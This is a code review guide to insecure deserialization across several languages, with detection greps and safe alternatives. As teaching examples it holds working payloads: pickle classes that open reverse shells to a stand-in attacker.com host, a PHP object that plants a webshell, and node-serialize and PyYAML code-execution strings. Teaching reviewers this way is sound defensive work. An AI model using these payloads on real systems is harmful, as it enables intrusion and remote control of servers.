Insecure Deserialization: Code Review Guide
1. Introduction to Insecure Deserialization
Insecure deserialization occurs when an application deserializes (reconstructs objects from) data that an attacker has tampered with. Serialization converts in-memory objects into a byte stream for storage or transmission; deserialization reverses this. When the serialized data comes from an untrusted source, the deserialization process can instantiate arbitrary objects and trigger magic methods (constructors, destructors, hooks) that execute attacker-controlled code.
Why This Matters
Insecure deserialization was listed in the OWASP Top 10 as A8:2017 and was merged into "Software and Data Integrity Failures" (A08:2021). Its most severe impact, and a common one, is Remote Code Execution. The vulnerability class is language-agnostic: Java, Python, PHP, .NET, Ruby, and even Node.js all have dangerous deserialization patterns. High-profile cases include a Java deserialization RCE reported against a PayPal application; the 2017 Equifax breach is often cited alongside it, although the Apache Struts flaw exploited there (CVE-2017-5638) was an OGNL expression injection rather than a deserialization bug.
In this guide, you'll learn how serialization/deserialization works and why it's dangerous, specific exploitation techniques for Java, Python, PHP, Node.js, .NET, and Ruby, what gadget chains are and how they achieve RCE, how to identify dangerous deserialization patterns during code review, and how to prevent deserialization attacks with safe alternatives.
Why is JSON.parse() generally safe while pickle.loads() and Java's ObjectInputStream are dangerous?
2. How Deserialization Attacks Work
The attack follows a consistent pattern across all languages: (1) The application serializes objects and exposes them to the client (cookies, API responses, message queues). (2) The attacker modifies the serialized data to reference dangerous classes. (3) The application deserializes the modified data, instantiating attacker-chosen objects. (4) Magic methods on those objects execute during deserialization, running attacker code.
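Steps 3 and 4 can be seen in a harmless form. The sketch below is illustrative only: the `Payload` class is hypothetical, and `sorted` stands in for a dangerous callable such as `os.system`. It shows that the byte stream, not the application, decides which callable runs during `pickle.loads()`, while a data-only format such as JSON can only produce inert values.

```python
import json
import pickle


class Payload:
    """Hypothetical stand-in for an attacker-crafted object."""

    def __reduce__(self):
        # The payload chooses the callable and its arguments.
        # sorted() is a harmless substitute for something like os.system.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Payload())

# Deserialization invokes the callable named inside the byte stream.
# The result is whatever that callable returned, not a Payload instance.
restored = pickle.loads(blob)
print(type(restored).__name__, restored)

# A data-only format cannot name a callable: the same idea expressed
# as JSON comes back as a plain dictionary and nothing is executed.
decoded = json.loads('{"callable": "sorted", "args": [3, 1, 2]}')
print(type(decoded).__name__, decoded)
```

Swapping `sorted` for a function with side effects is all an attacker needs to do, which is why the format itself, rather than any particular class in the application, is the problem.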
Magic methods are special methods that the language runtime calls automatically during object lifecycle events. In deserialization attacks, the key magic methods are:
Magic Methods Triggered During Deserialization
| Language | Method | When Called | Danger |
|---|---|---|---|
| Java | readObject() | When ObjectInputStream reconstructs the object | Runs class-defined logic on attacker-controlled field values; gadget classes turn this into code execution |
| Java | readResolve() | After readObject() to resolve object references | Can substitute a different object |
| Python | __reduce__() | Returns a callable + args that pickle uses to reconstruct | Directly specifies what function to call — trivial RCE |
| Python | __setstate__() | Called to restore object state after creation | Can execute code during state restoration |
| PHP | __wakeup() | Called immediately when unserialize() creates the object | Common in gadget chains that trigger further actions |
| PHP | __destruct() | Called when the object is garbage collected | Deferred execution — even if __wakeup is restricted |
| .NET | [OnDeserialized] callback / IDeserializationCallback.OnDeserialization() | After the formatter has rebuilt the object graph | Runs class-defined logic on attacker-controlled state post-deserialization |
| Ruby | marshal_load() | Called to restore object from marshaled data | Can execute arbitrary code during load |
Simplest deserialization attack: Python pickle
import pickle
import os

# Legitimate serialized data (a simple dictionary):
safe_data = pickle.dumps({"user": "alice", "role": "viewer"})
# b'\x80\x04\x95...' (second byte = pickle protocol; 4 is the default on Python 3.8-3.13)

# Attacker crafts a malicious class:
class Exploit:
    def __reduce__(self):
        # __reduce__ tells pickle HOW to reconstruct this object
        # It returns: (callable, args)
        # pickle will call: os.system("id")
        return (os.system, ("id",))

malicious_data = pickle.dumps(Exploit())

# Application deserializes untrusted data:
result = pickle.loads(malicious_data)
# → Executes "id" command on the server!
# uid=1000(webapp) gid=1000(webapp)
# (result holds the exit status returned by os.system, not an Exploit object)

# The attacker never needed to know what the original data looked like.
# They just need pickle.loads() to process their crafted bytes.

An application receives serialized objects via cookies. A developer adds HMAC signature verification before deserialization. Is this sufficient?
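A signature check proves only that the cookie was issued by someone holding the key; it does not make the deserializer itself safe if the key leaks or if another code path feeds it unsigned data. A more defensive arrangement, sketched below under assumptions, verifies the HMAC first and then parses a data-only format. The names `SECRET_KEY`, `sign_session`, and `load_session` are hypothetical, and the cookie layout (`base64(json).hexdigest`) is just one possible choice.

```python
import base64
import hashlib
import hmac
import json

# Hypothetical key: in practice this would come from server-side secret storage.
SECRET_KEY = b"replace-with-a-random-server-side-key"


def sign_session(session: dict) -> str:
    """Serialize the session as JSON and append an HMAC-SHA256 tag."""
    body = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode())
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest()
    return f"{body.decode()}.{tag}"


def load_session(cookie: str) -> dict:
    """Verify the tag BEFORE touching the body, then parse data-only JSON."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        raise ValueError("malformed cookie")
    expected = hmac.new(SECRET_KEY, body.encode(), hashlib.sha256).hexdigest()
    # compare_digest avoids leaking the match position through timing.
    if not hmac.compare_digest(expected.encode(), tag.encode()):
        raise ValueError("bad signature")
    return json.loads(base64.urlsafe_b64decode(body))


cookie = sign_session({"user": "alice", "role": "viewer"})
print(load_session(cookie))
```

Even if the key were compromised in this design, a forged cookie could only inject dictionary values, not executable objects.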
3. Java Deserialization
Java deserialization is the most extensively researched and exploited deserialization vulnerability class. Java's ObjectInputStream can instantiate any serializable class on the classpath, and the rich Java library ecosystem provides abundant "gadget chains" — sequences of classes whose methods chain together to achieve code execution.
Vulnerable: Deserializing untrusted Java objects
// ❌ VULNERABLE: Deserializing user-controlled data
import java.io.*;

public class UserSessionHandler {

    // Receives serialized session from cookie or API body
    public UserSession loadSession(byte[] data) throws Exception {
        ByteArrayInputStream bis = new ByteArrayInputStream(data);
        ObjectInputStream ois = new ObjectInputStream(bis);

        // This single line can execute ARBITRARY CODE
        // if the attacker controls the byte[] data!
        Object obj = ois.readObject(); // ← RCE happens HERE

        return (UserSession) obj; // Cast happens AFTER deserialization
        // Even if the cast fails, the damage is already done:
        // malicious readObject() methods have already executed
    }
}

// The cast to UserSession is NOT a security check!
// By the time Java tries the cast, ObjectInputStream has already:
// 1. Parsed the serialized bytes
// 2. Instantiated the attacker's chosen classes
// 3. Called readObject() on each, executing malicious code

Java serialized data is identifiable by its magic bytes: AC ED 00 05 (hex) or rO0AB (Base64-encoded). During code review, search for these signatures in cookies, HTTP headers, API bodies, and message queues.
Where Java deserialization appears in applications
// Common Java deserialization surfaces:

// 1. HTTP cookies or parameters (Base64-encoded)
// HttpServletRequest exposes getCookies(), so the cookie is looked up by name
Cookie sessionCookie = Arrays.stream(request.getCookies())
        .filter(c -> "session".equals(c.getName()))
        .findFirst().orElseThrow();
String sessionData = sessionCookie.getValue();
byte[] decoded = Base64.getDecoder().decode(sessionData);
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(decoded));
Object session = ois.readObject(); // ❌ RCE

// 2. JMX (Java Management Extensions), often exposed on internal ports
// Remote JMX uses ObjectInputStream internally

// 3. RMI (Remote Method Invocation) for inter-service communication
// RMI protocol uses Java serialization by default

// 4. Message queues (ActiveMQ, RabbitMQ with Java serialization)
ObjectMessage msg = (ObjectMessage) consumer.receive();
Object payload = msg.getObject(); // ❌ RCE

// 5. ViewState in JSF (JavaServer Faces)
// Encrypted/signed ViewState can be attacked if the key is known

// 6. Spring Session with Java serialization
// Spring can serialize session data to Redis/database using ObjectInputStream

The Gadget Chain Concept
The attacker doesn't need to find a custom vulnerable class. They chain together methods from common libraries already on the classpath (Apache Commons Collections, Spring, Hibernate). A "gadget chain" is a sequence like: Apache Commons Collections InvokerTransformer → calls Runtime.exec(). Tools like ysoserial generate payloads for dozens of known gadget chains across popular Java libraries.
You find ObjectInputStream.readObject() in your codebase. The developer says it's safe because the application only serializes UserSession objects. What's wrong with this argument?
4. Python pickle & PyYAML
Python's pickle module is explicitly documented as unsafe: "Warning: The pickle module is not secure. Only unpickle data you trust." Despite this, pickle is widely used for caching, session storage, ML model serialization, and inter-process communication.
Python pickle: Multiple RCE techniques
import pickle, os

# Technique 1: __reduce__ method (most common)
class RCE1:
    def __reduce__(self):
        return (os.system, ("id",))

# Technique 2: Reverse shell via __reduce__
class RCE2:
    def __reduce__(self):
        import subprocess
        return (subprocess.call, (["/bin/bash", "-c",
            "bash -i >& /dev/tcp/attacker.com/4444 0>&1"],))

# Technique 3: Arbitrary code via exec
class RCE3:
    def __reduce__(self):
        return (exec, ("import socket,subprocess,os;"
                       "s=socket.socket();"
                       "s.connect(('attacker.com',4444));"
                       "os.dup2(s.fileno(),0);"
                       "os.dup2(s.fileno(),1);"
                       "os.dup2(s.fileno(),2);"
                       "subprocess.call(['/bin/sh','-i'])",))

# Technique 4: Using eval (shorter payload)
class RCE4:
    def __reduce__(self):
        return (eval, ("__import__('os').system('id')",))

# Any of these, when serialized and deserialized:
payload = pickle.dumps(RCE1())
pickle.loads(payload)  # → Executes "id" on the server

PyYAML: YAML deserialization RCE
import yaml

# ❌ VULNERABLE: yaml.load() with full Loader
# PyYAML can instantiate Python objects via YAML tags

malicious_yaml = """
!!python/object/apply:os.system
  args: ['id']
"""

# yaml.load(malicious_yaml, Loader=yaml.FullLoader)  # RCE in older PyYAML
yaml.load(malicious_yaml, Loader=yaml.UnsafeLoader)  # Explicit unsafe

# Other YAML RCE payloads:
# !!python/object/new:subprocess.check_output [['id']]
# !!python/object/apply:subprocess.Popen
# - ['cat', '/etc/passwd']

# ✅ SAFE: Always use yaml.safe_load()
# (user_input is the untrusted YAML text received by the application)
data = yaml.safe_load(user_input)  # Only creates basic Python types

Where Pickle Appears in Codebases
During code review, search for these pickle usage patterns: pickle.loads() on data from HTTP requests, cookies, or database fields; the shelve module (uses pickle internally); joblib.load() for ML model loading; torch.load() for PyTorch models (pickle-based, unless weights_only=True restricts what can be loaded); Redis/Memcached session storage with pickle serialization; Celery task arguments serialized with pickle; and pandas.read_pickle() for DataFrame serialization.
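Where pickle cannot be removed outright, the standard library allows overriding `Unpickler.find_class()` so that only an explicit allowlist of globals can be resolved. The following is a minimal sketch of that pattern; `ALLOWED_GLOBALS`, `RestrictedUnpickler`, and `restricted_loads` are illustrative names, and the allowlist contents are an assumption that would need to match the application's real data.

```python
import io
import os
import pickle

# Assumed allowlist: only these (module, name) pairs may be resolved.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream references a global (class or function).
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads() that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Exploit:
    def __reduce__(self):
        return (os.system, ("id",))


# Plain containers need no globals, so they load normally.
print(restricted_loads(pickle.dumps({"user": "alice", "role": "viewer"})))

# The malicious stream is rejected when it tries to resolve os.system,
# before anything is called.
try:
    restricted_loads(pickle.dumps(Exploit()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

This narrows the attack surface but is weaker than switching to a data-only format: every allowlisted class becomes part of the trusted code base and has to be reviewed as a potential gadget.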
5. PHP unserialize()
PHP's unserialize() is one of the most commonly exploited deserialization functions in web applications. PHP serialized data is human-readable (e.g., O:4:"User":1:{s:4:"name";s:5:"alice";}), making it easy for attackers to craft payloads.
PHP unserialize: Exploitation via __wakeup and __destruct
// PHP serialized format is text-based and readable:
// O:4:"User":1:{s:4:"name";s:5:"alice";}
// O = Object, 4 = class name length, "User" = class name
// 1 = number of properties, s:4:"name" = string property name
// s:5:"alice" = string property value

// ❌ VULNERABLE: Deserializing user-controlled data
$data = unserialize($_COOKIE['session']);

// Attacker exploits PHP magic methods:
// __wakeup() is called when the object is unserialized
// __destruct() is called when the object is destroyed (garbage collection)
// __toString() is called when the object is used as a string

// Example: File deletion via __destruct
class CacheFile {
    public $filename;
    public function __destruct() {
        // Cleanup: delete cache file when object is destroyed
        unlink($this->filename); // ← Attacker controls $filename!
    }
}

// Attacker sends cookie with:
// O:9:"CacheFile":1:{s:8:"filename";s:11:"/etc/passwd";}
// When the object is destroyed, __destruct() attempts to delete /etc/passwd
// (it succeeds only if the PHP process has permission to do so)

// For RCE, chain through classes that call eval(), system(), exec(), etc.
class Logger {
    public $logFile;
    public $logData;
    public function __destruct() {
        file_put_contents($this->logFile, $this->logData);
    }
}
// Attacker writes a PHP webshell (each s:N length must match the string exactly):
// O:6:"Logger":2:{s:7:"logFile";s:14:"/var/www/s.php";s:7:"logData";s:30:"<?php system($_GET['cmd']); ?>";}

Where PHP unserialize appears
// ❌ Common vulnerable patterns in PHP applications:

// 1. Session data in cookies
$session = unserialize(base64_decode($_COOKIE['session']));

// 2. User preferences
$prefs = unserialize($row['preferences']); // From database

// 3. Cached objects
$cached = unserialize(file_get_contents($cacheFile));

// 4. API parameters
$data = unserialize($_POST['data']);

// 5. WordPress serialized options
$options = unserialize(get_option('my_plugin_settings'));

// ✅ SAFE alternatives:
$data = json_decode($input, true); // Use JSON instead
// Or restrict allowed classes (PHP 7+):
$data = unserialize($input, ['allowed_classes' => ['User', 'Settings']]);

A PHP application uses unserialize() on data from the database, not directly from user input. Is this safe?
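Database rows are frequently written from earlier user input, so stored values deserve the same scrutiny as cookies. As a review aid, the sketch below scans a stored PHP-serialized string for object markers and reports the class names it would instantiate. The regular expression and the function name `php_object_classes` are assumptions made for illustration; this is a heuristic, not a parser, and a string value that merely contains text shaped like `;O:4:"X":0:` would produce a false positive.

```python
import re

# Matches object markers such as O:9:"CacheFile":1: (or C:... for classes
# with custom serialization) at the start of the value or after ';' / '{'.
OBJECT_MARKER = re.compile(r'(?:^|[;{])[OC]:\d+:"([^"]+)":\d+:')


def php_object_classes(serialized: str) -> list:
    """Return the class names referenced by object markers in the payload."""
    return OBJECT_MARKER.findall(serialized)


samples = [
    'a:1:{s:4:"name";s:5:"alice";}',                            # plain array
    'O:9:"CacheFile":1:{s:8:"filename";s:11:"/etc/passwd";}',   # top-level object
    'a:1:{i:0;O:4:"User":0:{}}',                                # nested object
]
for value in samples:
    print(php_object_classes(value), "<-", value)
```

Any class name that appears in data the application expected to be a plain array is worth tracing back to where that value was written.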
6. Node.js & YAML Deserialization
Node.js doesn't have a built-in native serialization format like Java or Python. However, several npm packages provide serialization that can lead to RCE, and YAML parsing across all languages can be dangerous.
node-serialize: RCE via IIFE in serialized functions
// The "node-serialize" package can serialize/deserialize functions
// ❌ This package has a known RCE vulnerability (CVE-2017-5941)

const serialize = require('node-serialize');

// Attacker crafts a payload with an immediately-invoked function:
const payload = '{"exploit":"_$$ND_FUNC$$_function(){require(\'child_process\').execSync(\'id\')}()"}';

// When deserialized, the function is reconstructed AND executed:
serialize.unserialize(payload);
// → Executes "id" on the server!

// The _$$ND_FUNC$$_ marker tells node-serialize to treat the value
// as a function. The trailing () makes it an IIFE, executed immediately.

js-yaml and other YAML parsers
// js-yaml (Node.js): older versions had dangerous defaults
const yaml = require('js-yaml');

// ❌ VULNERABLE (js-yaml 3.x): load() with DEFAULT_FULL_SCHEMA, which
// includes JavaScript-specific tags such as !!js/function
const unsafeData = yaml.load(userInput, { schema: yaml.DEFAULT_FULL_SCHEMA });

// ✅ SAFE (js-yaml 4.x): load() uses a safe schema by default
const safeData = yaml.load(userInput);

// ✅ SAFE (js-yaml 3.x): explicitly select the safe schema
// (equivalent to yaml.safeLoad(userInput) in that version)
const safeDataV3 = yaml.load(userInput, { schema: yaml.DEFAULT_SAFE_SCHEMA });

// General rule across all languages:
// - Python: yaml.safe_load() ✅, yaml.load(Loader=FullLoader) ❌
// - Ruby: YAML.safe_load() ✅, YAML.load() ❌ (Ruby < 3.1)
// - Java (SnakeYAML): new Yaml(new SafeConstructor()) ✅, new Yaml() ❌ (SnakeYAML < 2.0)

Other Dangerous Node.js Patterns
Beyond dedicated serialization libraries, watch for these Node.js patterns: eval() or new Function() on serialized/stored data. vm.runInNewContext() with user-controlled code (sandbox escapes exist). MongoDB query injection via $where (executes JavaScript server-side). Redis EVAL with user-controlled Lua scripts.
7. Detection During Code Review
Deserialization vulnerabilities follow language-specific patterns. During code review, systematically search for deserialization functions that process untrusted data.
Deserialization Detection by Language
| Language | Dangerous Functions | Magic Bytes / Signatures | Safe Alternative |
|---|---|---|---|
| Java | ObjectInputStream.readObject(), readUnshared(), XMLDecoder.readObject() | AC ED 00 05 (hex), rO0AB (Base64) | JSON (Jackson/Gson), Protocol Buffers |
| Python | pickle.loads(), shelve.open(), joblib.load(), torch.load() | \x80\x05\x95 (pickle protocol 5) | json.loads(), yaml.safe_load() |
| PHP | unserialize() | O:, a:, s:, i: prefixes (text-based) | json_decode(), allowed_classes option |
| Node.js | node-serialize.unserialize(), cryo.parse() | _$$ND_FUNC$$_ marker | JSON.parse() (produces data only; never executes code) |
| .NET | BinaryFormatter.Deserialize(), ObjectStateFormatter, LosFormatter | 00 01 00 00 00 FF FF FF FF | System.Text.Json, protobuf-net |
| Ruby | Marshal.load(), YAML.load() (< 3.1) | \x04\x08 (Marshal magic) | JSON.parse(), YAML.safe_load() |
| YAML (all) | yaml.load() (Python), YAML.load (Ruby), Yaml() (Java SnakeYAML) | !!python/object, !!ruby/object tags | safe_load(), SafeConstructor |
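The signatures in the table lend themselves to a quick triage helper for values captured from cookies, headers, or queue messages. The sketch below is one possible approach under assumptions: `SIGNATURES`, `sniff`, and `sniff_text` are illustrative names, only a subset of formats is covered, and short prefixes such as Ruby's two-byte magic will occasionally match unrelated binary data.

```python
import base64

# Binary prefixes taken from the detection table above.
SIGNATURES = {
    "java-serialization": bytes.fromhex("aced0005"),
    "dotnet-binaryformatter": bytes.fromhex("0001000000ffffffff"),
    "ruby-marshal": b"\x04\x08",
}


def sniff(raw: bytes):
    """Return a format label if raw starts with a known signature, else None."""
    for name, magic in SIGNATURES.items():
        if raw.startswith(magic):
            return name
    # Pickle protocol 2+ begins with the PROTO opcode 0x80 and the protocol number.
    if len(raw) >= 2 and raw[0] == 0x80 and 2 <= raw[1] <= 5:
        return "python-pickle"
    if b"_$$ND_FUNC$$_" in raw:
        return "node-serialize-function"
    return None


def sniff_text(value: str):
    """Check a text value both as-is and after Base64 decoding."""
    candidates = [value.encode("utf-8", "replace")]
    try:
        candidates.append(base64.b64decode(value, validate=True))
    except ValueError:  # binascii.Error is a ValueError subclass
        pass
    for raw in candidates:
        label = sniff(raw)
        if label:
            return label
    return None


java_cookie = base64.b64encode(bytes.fromhex("aced0005") + b"sr\x00\x0bUserSession").decode()
print(java_cookie[:5], "->", sniff_text(java_cookie))
print(sniff_text("plain session id 1234"))
```

A positive match only says what the bytes look like; the reviewer still has to confirm that the application passes them to a deserializer.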
Quick grep patterns for deserialization
# Java (-E enables alternation with |; parentheses are escaped to match literally)
grep -rnE "ObjectInputStream|readObject\(|readUnshared\(|XMLDecoder|XStream" --include="*.java" .

# Python
grep -rnE "pickle\.loads|pickle\.load|shelve\.|joblib\.load|torch\.load|yaml\.load|yaml\.full_load" --include="*.py" .

# PHP
grep -rn "unserialize(" --include="*.php" .

# Node.js
grep -rnE "unserialize|deserialize|node-serialize|cryo" --include="*.js" --include="*.ts" .

# .NET
grep -rnE "BinaryFormatter|ObjectStateFormatter|NetDataContractSerializer|LosFormatter|SoapFormatter" --include="*.cs" .

# Ruby
grep -rnE "Marshal\.load|YAML\.load[^_]" --include="*.rb" .

# Check for Java serialized data in cookies/tokens
grep -rnE "rO0AB|ACED0005|base64.*decode.*readObject" --include="*.java" --include="*.xml" --include="*.properties" .

You find this in a Python Flask application: session_data = pickle.loads(redis.get(session_id)). The developer says Redis is internal and trusted. Should you flag this?
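Text searches like the grep patterns above also match comments and string literals. For Python code, a syntax-aware pass can report only real call sites. The following is a rough sketch using the standard `ast` module; the `DANGEROUS_CALLS` set and the helper names are assumptions, and the scan deliberately does not resolve aliases (`import pickle as p`, `from pickle import loads`), so it complements grep rather than replacing it.

```python
import ast

# Fully qualified call names to flag (an illustrative, non-exhaustive set).
DANGEROUS_CALLS = {
    "pickle.load", "pickle.loads",
    "yaml.load", "yaml.unsafe_load", "yaml.full_load",
    "joblib.load", "torch.load", "shelve.open", "pandas.read_pickle",
}


def dotted_name(node):
    """Turn an expression like pickle.loads into the string 'pickle.loads'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # calls on subscripts, call results, etc. are ignored


def find_deserialization_calls(source: str, filename: str = "<source>"):
    """Return sorted (line number, call name) pairs for flagged call sites."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in DANGEROUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


sample = (
    "import json, pickle\n"
    "# pickle.loads() mentioned in a comment is not reported\n"
    "session_data = pickle.loads(redis.get(session_id))\n"
    "body = json.loads(request_body)\n"
)
for lineno, name in find_deserialization_calls(sample):
    print(f"line {lineno}: {name}")
```

Each finding still needs a manual trace of where the argument comes from; a cache or database that other services can write to counts as untrusted input.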